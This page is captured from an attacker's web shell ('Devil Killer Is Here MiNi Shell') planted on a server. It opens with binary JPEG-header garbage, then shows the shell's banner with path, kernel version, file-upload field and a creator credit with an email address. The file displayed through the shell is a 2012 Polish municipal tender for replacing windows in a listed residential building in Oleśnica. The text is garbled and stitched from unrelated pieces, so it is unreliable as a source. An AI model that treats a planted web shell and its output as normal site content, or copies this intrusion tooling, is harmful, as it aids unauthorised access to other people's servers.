JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120424/130132-N-2012.html

<p class="kh_header"><b>Oleśnica: Przedmiotem zamówienia są  roboty budowlane polegające na Wymianie stolarki okiennej na klatkach schodowych w budynku mieszkalnym przy ul. Wojska Polskiego 53, 53f w Oleśnicy.</b><br>
<b>Numer ogłoszenia: 130132 - 2012; data zamieszczenia: 24.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Budynków Komunalnych w Oleśnicy , ul. Wojska Polskiego 13, 56-400 Oleśnica, woj. dolnośląskie, tel. 071 3980911, faks 071 3980912.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zbk.olesnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka samorzadowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia są  roboty budowlane polegające na Wymianie stolarki okiennej na klatkach schodowych w budynku mieszkalnym przy ul. Wojska Polskiego 53, 53f w Oleśnicy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zakres czynności i planowanych prac związanych z wymianą okien:
-obowiązkowa inwentaryzacja kontrolna otworów okiennych przed realizacją warsztatową wyrobów,
-wykonanie i dostawa nowej stolarki okiennej drewnianej jednoramowej, wykonanej na wzór istniejącej,
-etapowy demontaż okien istniejących wraz z parapetami wewnętrznymi przewidywanymi do wymiany,
-sukcesywny montaż nowych okien i parapetów wewnętrznych,
-naprawa i uzupełnienie tynków wewnętrznych ościeży wraz z ich malowaniem,
-uszczelnienie masą silikonową styku okien z ościeżami oraz parapetami zewnętrznymi i wewnętrznymi, 
-usunięcie odpadów rozbiórkowych wraz z ich utylizacją.

2. Wymagania techniczne dotyczące okien.
-Ze względu na zabytkowy charakter budynku (wpis do rej. zabytków pod poz. nr 595/W z dnia 09.XII.86 r.) stolarkę okienną należy wykonać bezwzględnie z zachowaniem istniejących podziałów i  wymiarów. Z maksymalną starannością odwzorować historyczny wygląd okien. Istniejące okna skrzynkowe nie posiadają ozdobnych, charakterystycznych dla okresu realizacji, detali lub motywów architektonicznych (z wyjątkiem ryflowania poziomego części ślemieni okiennych). 
-Wymóg bezwzględnego zachowania stanu obecnego dotyczy również istniejących podokienników zewnętrznych wykonanych z kształtek i cegieł ceramicznych (częściowo klinkierowych). Wysokość brutto przewidzianych do zamontowania  okien należy dostosować do poziomu górnej krawędzi podokiennika ceramicznego z taką dokładnością, by nie naruszać tego elementu historycznego z jednoczesnym zachowaniem pełnej funkcjonalności i szczelności nowego okna. 
-Drewno sosnowe klejone trójwarstwowo, malowane trzykrotnie natryskowo, kolor biały (RAL 9010).
-Skrzydła ze szprosami wiedeńskimi naklejanymi dwustronnie bez przekładki międzyszybowej.
-Uszczelnienie odporne na działanie warunków atmosferycznych - wciskane, montowane w skrzydłach i ościeżnicach.
-Parapety wewnętrzne drewniane gr. 3,5 do 4 cm, z drewna sosnowego, białe.
-W oknach dwuskrzydłowych słupki ruchome (przy skrzydle rozwieranym), w części okien (trójdzielnych dwurzędowych) słupki stałe.
-Okucia obwiedniowe zamykające z blokadą obrotu klamki (typu np. Sigenia,  Roto NT  lub inne równoważne).
-Zabezpieczenie fabryczne antykorozyjne okuć.
-Okucia winne zapewniać rozszczelnienie (mikrowentylację) skrzydeł rozwieranych.
-Współczynnik infiltracji powietrza  < 0,30 m3.
-Szyby podwójne 4-16-4 zespolone jednokomorowe typu float lub thermofloat (z przestrzenią wypełnioną powietrzem lub argonem), o współczynniku przenikania ciepła U  1,1 W/m2xK.
-Przepuszczalność światła przez oszklenie Lt większe niż  75.
-Współczynnik przenikania słonecznego g większe od 50%.
-Szyby winne spełniać wymagania określone normą PN-B-13079.1997.
-Współczynnik przenikania ciepła dla okna Uw < 1,8 W/m2xK.
-Wodoszczelność: okna muszą spełniać wymóg całkowitej szczelności przy zraszaniu okien wodą w ilości 120 l/h na 1 m2 powierzchni przy różnicy ciśnień zgodnej z Instrukcją nr 224 ITB.
-Min. klasa odporności na obciążenie wiatrem: C2. Maksymalne ugięcie czołowe może wynieść 1/300 przy ciśnieniu parcia wiatru min. 800 Pa (wg normy PN-B-02011.1997/AZ1.2009).
-Izolacja akustyczna okna bez nawiewnika: RA2 > 30 dB (wg PN-B-02151-3.1999).
-Nawiewniki higrosterowane o przepływie powietrza > 30 m3/h z tłumieniem dźwięków > 35 dB, montowane w każdym oknie.
Lokalizacja nawiewników w oknach:
Górna część okna:
a)	ościeżnica lub skrzydło okienne w przypadku okien prostokątnych, 
b)	ślemię poziome w przypadku okien łukowych.

3. Stolarka musi posiadać wymiary i podział stolarki zdemontowanej.
1) Obowiązuje dotychczasowy układ i kierunek otwierania skrzydeł oraz ilość szprosów w każdym skrzydle.
2) Jedno z dolnych skrzydeł w każdym oknie planuje się jako skrzydło otwierano-uchylne (propozycja - jak na zestawieniu stolarki).
3) Parapety zewnętrzne - bez zmian. Zachować należy stan dotychczasowy - kształtki oraz płytki ceramiczne o cechach historycznych (element zabytkowy pierwotny), zamontowane w okresie realizacji obiektu.

4) Elementy stolarki okiennej realizować wg parametrów podanych w niniejszym projekcie oraz w Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych, stanowiącej integralną część opracowanej dokumentacji.

Wszystkie stosowane materiały i wyroby nie mogą stanowić zagrożenia dla zdrowia i higieny użytkowników. Muszą posiadać właściwe atesty, aprobaty techniczne i certyfikaty dopuszczające je do stosowania w budownictwie.

4. Uwagi realizacyjne i zalecenia technologiczne.
1)	Przy wbudowaniu stolarki zachować należy odpowiednie luzy uwzględniające rozszerzalność termiczną materiałów i wyrobów. Różnica pomiędzy ścianami murowanymi otworu a wymiarem zewnętrznym ościeżnicy winna wynosić min. 30 mm na wysokości progu oraz min. 20 mm na szerokości. 
2)	Masa uszczelniająca (silikon) do stosowania zewnętrznego musi posiadać cechy mrozoodporności.
3)	Umocowanie kotew w ścianie na głęb. min. 50 mm. 
4)	Sposób zamontowania okna winien zapewnić swobodny odpływ wody z ościeżnicy na podokiennik zewnętrzny.
5)	Odległości pomiędzy kotwami mocującymi ościeżnicę nie powinny przekraczać 70 cm, odległość maksymalna od naroży nie większa niż 15 cm. Dodatkowe punkty mocowania należy przewidzieć w miejscu łączenia szprosów konstrukcyjnych (ślemieni) oraz słupków podziałowych płaszczyzny okna.
6)	Szczelinę pomiędzy ościeżem wypełnić materiałem termoizolacyjnym (pianką poliuretanową).
7)	Oparcie ościeżnicy okna na węgarku winno być wykonane w taki sposób, by zewnętrzna część ościeżnicy wystawała poza lico węgarka na szer. ok. 20 mm.
8)	Parapety wewnętrzne drewniane gr. 35-40 mm malowane w kolorze okien (na biało) montować na piance poliuretanowej lub kleju montażowym. Parapet należy wpuścić we wrąb w ościeżnicy na głębokość min. 15 mm z zapewnieniem wysunięcia jego krawędzi poza lico ściany na odl. min. 40 mm.
9)	Jednostka (firma) wykonawcza dokonująca wymiany stolarki w oparciu o niniejszy projekt, zobowiązana jest do dokonania pomiaru okien i parapetów wewnętrznych przed ich wykonaniem warsztatowym.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, Art. 67 ust1 pkt 6.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.11.00-9, 45.11.12.94-4, 45.44.21.00-8, 45.11.12.20-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wpłaty wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>podpisanie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>podpisanie oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>podpisanie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>podpisanie oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>podpisanie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oryginał  lub kserokopia, poświadczona przez Wykonawcę za zgodność  z oryginałem, aktualnego odpisu z właściwego rejestru albo   aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub  zgłoszenia  do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania  ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany i uzupełnienia treści umowy mogą być dokonywane pod rygorem  nieważności   wyłącznie w formie aneksu podpisanego przez obie strony.
2. Zakazuje się istotnych zmian postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy.
3. Zmiana umowy może nastąpić w formie pisemnego aneksu w przypadku:
1) zmiany terminu realizacji przedmiotu umowy z przyczyn nie leżących po stronie Wykonawcy;
2) zmiany przedstawicieli stron wyznaczonych do kontaktów w zakresie realizacji przedmiotu umowy;
3) zmniejszenia zakresu przedmiotu umowy w razie zaistnienia obiektywnych przesłanek do wprowadzenia takiej zmiany;
4) wystąpienia oczywistych omyłek pisarskich i rachunkowych w treści umowy,
5) zmiany powszechnie obowiązujących przepisów prawa, w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zbk.olesnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Budynków Komunalnych w Oleśnicy
ul. Wojska Polskiego 13
56-400 Oleśnica
pok. 115.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2012 godzina 10:00, miejsce: Zakład Budynków Komunalnych w Oleśnicy
ul. Wojska Polskiego 13
56-400 Oleśnica
pok. 102.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com